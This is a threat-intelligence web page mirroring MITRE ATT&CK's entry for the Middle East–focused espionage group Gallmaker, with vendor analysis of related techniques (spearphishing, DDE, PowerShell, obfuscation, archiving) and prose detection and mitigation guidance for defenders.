Live Active security incident? Get immediate response
MITRE ATT&CK® Group

G0084: Gallmaker

Gallmaker is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.[1]

EnterpriseG0084GroupObject v1.1 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

Gallmaker matters because MITRE describes it as a cyberespionage group focused on Middle East defense, military, and government victims, with activity reported since at least December 2017. The supplied technique relationships point to a practical defensive theme: targeted email attachments, user-driven execution, Windows scripting and DDE execution paths, obfuscation, and archiving of collected data. For leaders, the value is not to assume exposure, but to verify whether high-value users and sensitive functions have resilient email security, endpoint visibility, script logging, and response playbooks for targeted intrusion activity.

Executive priority

Prioritize this as a readiness and assurance question for organizations with government, defense, military, Middle East, or adjacent supply-chain exposure. Executives should ask whether controls and evidence exist across the likely intrusion path: phishing attachment prevention, user execution controls, PowerShell/DDE monitoring, detection of obfuscated content, and signs of data staging through archive utilities. This supports business continuity, incident decision-making, compliance evidence, and risk-based investment without assuming Gallmaker is currently targeting the organization.

Technical view

MITRE provides no dedicated detection text for Gallmaker, so SOC and IR teams should validate coverage against the related ATT&CK behaviors: T1566.001 Spearphishing Attachment, T1204.002 Malicious File, T1059.001 PowerShell, T1559.002 Dynamic Data Exchange, T1027 Obfuscated Files or Information, and T1560.001 Archive via Utility. The relationship set suggests detection should correlate email attachment delivery and user opening events with child process creation, script execution, DDE/OLE-style document behavior, encoded or obfuscated command content, and archive creation in locations associated with user or sensitive data activity.

Likely telemetry

  • Email security logs for attachment delivery, sender metadata, attachment names/types, and disposition decisions
  • Endpoint process creation telemetry showing document applications spawning script interpreters, shells, archive utilities, or other unusual child processes
  • PowerShell execution telemetry, including command line, script block, module, and encoded command indicators where available
  • Windows event and endpoint telemetry relevant to DDE/OLE document execution behavior
  • File creation and modification events for compressed, encrypted, encoded, or unusually named files

Detection direction

  • Validate that detections are behavior-based rather than dependent only on known malware, because the external reference describes the group as using living-off-the-land style activity.
  • Tune phishing and malicious-file detections around targeted attachments and follow-on execution, especially document-to-script or document-to-command-line process chains.
  • Review PowerShell monitoring for visibility into command content, encoded commands, remote or delegated execution patterns, and suspicious parent processes; account for legitimate administration to reduce false positives.
  • Test whether DDE-related document execution is visible in endpoint telemetry and whether older document execution paths are blocked, logged, or merely allowed silently.
  • Correlate obfuscation and archive-utility use with user context and data location; archive creation alone is common, but archive activity following suspicious execution is higher value.

Mitigation priorities

  • Start with phishing attachment risk reduction: attachment filtering, detonation or inspection, user reporting workflows, and controls for high-risk file types where operationally feasible.
  • Harden user-driven execution paths by restricting unsafe document behaviors and reducing unnecessary DDE/OLE-style execution exposure.
  • Constrain and monitor PowerShell use according to administrative need, with logging sufficient for investigation and alert triage.
  • Ensure endpoint controls and logging can observe obfuscated files, suspicious command lines, and archive utility use rather than relying only on static signatures.
  • Prepare IR playbooks for targeted attachment intrusions, including mailbox review, endpoint containment, script execution review, and search for staged archives.
Analyst notes and limits

The supplied ATT&CK object is a group entry, not a procedure-level incident report. Its official description supports targeting context and sector relevance, while the relationship context supplies the practical behaviors to validate. Because platforms are not specified on the Gallmaker object itself, platform references should be interpreted through the related techniques, especially Windows for PowerShell and DDE.

MITRE provides no official detection guidance for this group object, and the supplied data does not establish current activity, specific victims, infrastructure, malware, exploit use, or guaranteed defensive coverage. Local prioritization requires the organization’s geography, sector, identity exposure, email controls, endpoint visibility, and sensitive data workflows.

Official MITRE ATT&CK definition

Gallmaker

Gallmaker is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.[1]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

6 rows
Domain ID Name Relationship / procedure
Enterprise T1204.002 Malicious File Sub-technique

Gallmaker sent victims a lure document with a warning that asked victims to “enable content” for execution.CitationSymantec Gallmaker Oct 2018
Enterprise T1027 Obfuscated Files or Information

Gallmaker obfuscated shellcode used during execution.CitationSymantec Gallmaker Oct 2018
Enterprise T1560.001 Archive via Utility Sub-technique

Gallmaker has used WinZip, likely to archive data prior to exfiltration.CitationSymantec Gallmaker Oct 2018
Enterprise T1559.002 Dynamic Data Exchange Sub-technique

Gallmaker attempted to exploit Microsoft’s DDE protocol in order to gain access to victim machines and for execution.CitationSymantec Gallmaker Oct 2018
Enterprise T1059.001 PowerShell Sub-technique

Gallmaker used PowerShell to download additional payloads and for execution.CitationSymantec Gallmaker Oct 2018
Enterprise T1566.001 Spearphishing Attachment Sub-technique

Gallmaker sent emails with malicious Microsoft Office documents attached.CitationSymantec Gallmaker Oct 2018
Relationship explorer

All related ATT&CK context

uses · Technique T1204.002: Malicious File Enterprise uses · Technique T1027: Obfuscated Files or Information Enterprise uses · Technique T1560.001: Archive via Utility Enterprise uses · Technique T1559.002: Dynamic Data Exchange Enterprise uses · Technique T1059.001: PowerShell Enterprise uses · Technique T1566.001: Spearphishing Attachment Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.1
Created
Modified
Raw hash
f239a2659c1c852f...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.1 Current bundle f239a2659c1c…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    Symantec Gallmaker Oct 2018

    Symantec Security Response. (2018, October 10). Gallmaker: New Attack Group Eschews Malware to Live off the Land. Retrieved November 27, 2018.

    Open source URL
  2. [2]
    Gallmaker

    (Citation: Symantec Gallmaker Oct 2018)

  3. [3]
    mitre-attack G0084
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use